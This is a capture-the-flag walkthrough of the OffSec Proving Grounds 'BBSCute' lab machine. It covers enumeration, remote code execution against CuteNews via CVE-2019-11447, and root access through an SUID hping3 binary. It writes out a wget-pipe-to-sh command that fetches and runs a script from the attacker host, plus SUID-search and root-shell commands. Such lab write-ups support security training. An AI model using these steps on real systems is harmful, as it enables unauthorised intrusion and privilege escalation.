# Offsec Proving Grounds - BBSCute Walkthrough
### Machine Details
#### Name: BBSCute
#### IP address: 192.168.118.128
#### Difficulty: Easy
#### Points: 5
---
## Initial Enumeration
I started the box and was assigned the IP address 192.168.118.128. My first step was to conduct a scan. For this purpose I used nmap and found the following ports open: `22, 80, 88, 110, 995`.
Conducting further enumeration, I entered the IP address into the browser and I was presented with the page below:
There is also a web service running on port 88 so I visited the page also but was greeted with a Not Found error.
I then proceeded to do some directory enumeration on both web services using gobuster.
```
gobuster dir -u http://192.168.118.128 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o gobuster.out
gobuster dir -u http://192.168.118.128:88 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o gobuster.88.out
```
While that was running, I went back to the web service on port 80 and was finding around. Since the page presented an Apache default page, it will most likely be running PHP. So, I tried visting /index.php and alas, I was presented with a new page running the CuteNews CMS.
Since I don't have credentials, I proceeded to using the register option. I registered the user rudefish.
One thing I noticed on the registration form was that the captcha was not visible and it is required. What I did was to refresh captcha and then monitor the network request to obtain the value from the response.
Supplying the captca value, huqora, I was registered and redirected to a dashboard.
## Gaining access
One thing that caught my attention on the dasboard was the CuteNews version (I missed this on the login page). I proceeded to search Google for this version and found that it is vulnerable to a remote code exploit (RCE).
Visting the link highlighted above for [CVE-2019-11447](https://github.com/thewhiteh4t/cve-2019-11447), it explains the exploit and how to use it. I cloned the repo and followed the instructions provided as shown below.
## Editing /etc/hosts file
Although I provided all parameters, I was still getting an error. The error was due to the URL returned from the webpage - http://cute.calipendula/uploads/avatar_rudefish_rudefish.php. Since our machine does not know this address and cannot resolve it, it gives a connection error. To solve this, I added the address to my /etc/hosts file.
```
192.168.118.128 cute.calipendula
```
After doing this, I ran the exploit again and now I got a shell.
## Give me local.txt
Just moving around on the box, I changed directories and found the local.txt file at the /var/www folder.
In case you navigated to the home folder directly and could not find the file (obviously :XD), you can find it (since we know the name) using the command below:
```
find / -type f -name local.txt -ls 2>/dev/null
```
## Finding ways to elevate privileges
One of the first things I do when I gain initial foothold is to find out which commands I can run as other users using sudo. So I ran the command below.
```
sudo -l
```
Great! We can run the hping3 with the icmp option as root. Truth is, I spent quite some time on this trying to use it to gain a root shell as I found from research but I could not make it work (probably a rabbit hole). To work, the command should have been
```
(root) NOPASSWD: /usr/sbin/hping3 --icmp *
```
So I moved on to upload and run [linpeas.sh](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) on the machine and this retuned an interesting result.
```
On my box
python3 -m http.server 80
```
```
On machine
wget -O- http://192.168.49.118/linpeas.sh | sh -
```
Linpeas.sh found that the hping3 binary has the SUID bit set as the root user. You can read more about SUID binaries here - [SUID](https://www.techrepublic.com/article/linux-101-what-is-the-suid-permission/).
In case you do not like enumeration scripts, you could have found the binary by running the following command:
```
find / -type f -perm -04000 -ls 2>/dev/null
```
## Give me ROOT!!!!
Now all we have to do is run this binary, get a prompt and find a way to get a shell from it. A nice place to find such things out is [gtfobins](https://gtfobins.github.io).
At this point, we need to get a proper shell. For this, I used a bash reverse shell and then elevated it using python pty shell.
To get a root shell, we just need to run:
```
/usr/sbin/hping3
hping3> /bin/sh -p
```
Now we can read the proof.txt and we're done!
###### tags: `offsec proving grounds` `BBSCute` `CTF` `CuteNews` `suid`
Google Drive
Gist
Clipboard
Sign in via Facebook
Sign in via X(Twitter)
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
